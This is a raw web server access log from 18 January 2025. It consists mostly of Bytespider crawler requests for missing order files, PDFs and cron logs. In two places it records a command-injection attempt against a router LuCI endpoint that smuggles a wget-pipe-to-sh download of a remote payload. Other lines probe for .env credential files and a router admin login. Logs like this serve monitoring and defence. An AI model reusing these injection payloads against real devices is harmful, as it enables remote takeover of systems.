156.59.198.136 - - [18/Jan/2025:01:01:22 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105181003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
35.202.9.133 - - [18/Jan/2025:01:05:00 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
156.59.198.135 - - [18/Jan/2025:01:05:22 +0100] "GET /renault.activities.at/htdocs/log/cron/shipp_Export_Data_3115565.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:01:09:22 +0100] "GET /renault.activities.at/htdocs/log/cron/autologout_3116502.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:01:13:23 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12381516.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.144 - - [18/Jan/2025:01:13:51 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.163.215.73%2Fmoo+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [18/Jan/2025:01:17:23 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12251516.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:01:21:23 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115802.txt HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:01:25:23 +0100] "GET /renault.activities.at/htdocs/log/cron/check_inventory_days_3114857.txt HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [18/Jan/2025:01:27:04 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
156.59.198.135 - - [18/Jan/2025:01:29:23 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910081403_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:01:33:23 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104211103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:01:37:23 +0100] "GET /hausegger.activities.at/stats/lang/tooltips_w/awstats-tt-ro.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:01:41:23 +0100] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3114970.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.114.143 - - [18/Jan/2025:01:45:17 +0100] "GET /.env HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
87.120.114.143 - - [18/Jan/2025:01:45:17 +0100] "GET /wp-content/ HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
156.59.198.136 - - [18/Jan/2025:01:45:24 +0100] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-ua.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
105.159.192.164 - - [18/Jan/2025:01:48:10 +0100] "GET /auth/login.html HTTP/1.1" 404 287 "-" "python-requests/2.31.0"
105.159.192.164 - - [18/Jan/2025:01:48:11 +0100] "GET /index.php?act=op&pid=10 HTTP/1.1" 200 274 "-" "python-requests/2.31.0"
105.159.192.164 - - [18/Jan/2025:01:48:12 +0100] "GET /home.php HTTP/1.1" 404 282 "-" "python-requests/2.31.0"
105.159.192.164 - - [18/Jan/2025:01:48:12 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.31.0"
156.59.198.136 - - [18/Jan/2025:01:49:24 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11890006.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:01:53:25 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009231103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:01:57:25 +0100] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3116536.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:02:01:25 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11321002.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:02:05:25 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10884274.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:02:09:25 +0100] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116278.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:02:13:26 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108051603_RenOrder.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:02:17:25 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911281103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:02:21:26 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10969025.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:02:25:26 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202108131003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.216.18.83 - - [18/Jan/2025:02:29:24 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 293 "http://212.69.160.11:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
156.59.198.136 - - [18/Jan/2025:02:29:26 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10319976.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:02:33:26 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10969095.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.228 - - [18/Jan/2025:02:35:06 +0100] "GET /sitemaps HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
156.59.198.136 - - [18/Jan/2025:02:37:26 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/superscript.gif HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:02:41:26 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12210051.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:02:45:30 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/image.gif HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:02:49:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103031503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:02:53:31 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10748560.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:02:57:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006220903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:03:01:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912091403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:03:05:31 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11951490.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.226 - - [18/Jan/2025:03:08:28 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.136 - - [18/Jan/2025:03:09:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002261603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:03:13:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004171203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
114.33.164.167 - - [18/Jan/2025:03:14:33 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
156.59.198.136 - - [18/Jan/2025:03:17:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103190803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:03:21:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111261703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:03:25:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202007141403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:03:29:32 +0100] "GET /renault.activities.at/htdocs/binaries/10656106.doc HTTP/1.0" 404 310 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
31.220.1.144 - - [18/Jan/2025:03:33:03 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.163.215.73%2Fmoo+-O-+|+sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
156.59.198.136 - - [18/Jan/2025:03:33:32 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103151803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:03:37:33 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010061503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:03:41:33 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202003051803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:03:45:33 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10309950.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.30 - - [18/Jan/2025:03:47:51 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [18/Jan/2025:03:49:34 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10460094.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:03:53:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109281503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:03:57:35 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201911081203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:04:01:35 +0100] "GET /default/cgi-bin/lang/awstats-nb.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
101.108.159.81 - - [18/Jan/2025:04:03:56 +0100] "GET / HTTP/1.0" 200 423 "-" "curl/7.88.1"
146.19.24.168 - - [18/Jan/2025:04:05:32 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [18/Jan/2025:04:05:35 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/button.gif HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:04:09:35 +0100] "GET /renault.activities.at/htdocs/log/cron/autologout_3115144.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:04:13:35 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11054451.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
198.235.24.106 - - [18/Jan/2025:04:14:04 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.135 - - [18/Jan/2025:04:17:39 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/pasteword.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:04:21:39 +0100] "GET /renault.activities.at/htdocs/log/cron/exportXML_3115561.txt HTTP/1.0" 404 319 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:04:25:39 +0100] "GET /renault.activities.at/htdocs/editor/design/image/Office2003/bold.gif HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
192.155.90.220 - - [18/Jan/2025:04:26:35 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [18/Jan/2025:04:29:39 +0100] "GET /hausegger.activities.at/stats/lang/tooltips_f/awstats-tt-is.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:04:33:39 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12001626.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:04:37:39 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910041603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:04:41:40 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111031603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:04:45:40 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10981071.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
103.153.77.181 - - [18/Jan/2025:04:46:52 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
103.153.77.181 - - [18/Jan/2025:04:46:52 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
156.59.198.136 - - [18/Jan/2025:04:49:40 +0100] "GET /ed.activities.at/stats/lang/tooltips_m/awstats-tt-en.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:04:53:40 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006031403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:04:57:41 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912191203_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.16.39.104 - - [18/Jan/2025:04:58:31 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [18/Jan/2025:05:01:41 +0100] "GET /renault.activities.at/htdocs/log/cron/autologout_3115910.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:05:05:41 +0100] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-hu.txt HTTP/1.0" 404 315 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.185 - - [18/Jan/2025:05:08:26 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [18/Jan/2025:05:09:41 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3114977.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:05:13:41 +0100] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115177.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:05:17:41 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12239524.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
3.128.254.105 - - [18/Jan/2025:05:17:50 +0100] "\x16\x03\x01" 400 383 "-" "-"
3.128.254.105 - - [18/Jan/2025:05:18:26 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
156.59.198.136 - - [18/Jan/2025:05:21:41 +0100] "GET /default/cgi-bin/lang/awstats-ua.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:05:25:42 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10452679.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:05:29:42 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11077099.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Jan/2025:05:33:42 +0100] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/README.md HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Jan/2025:05:37:42 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201910211603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
117.241.252.6 - - [18/Jan/2025:05:40:00 +0100] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
156.59.198.136 - - [18/Jan/2025:05:41:42 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106220903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
35.240.7.120 - - [18/Jan/2025:05:45:13 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
156.59.198.136 - - [18/Jan/2025:05:45:42 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202107141003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
146.19.24.168 - - [18/Jan/2025:05:49:02 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
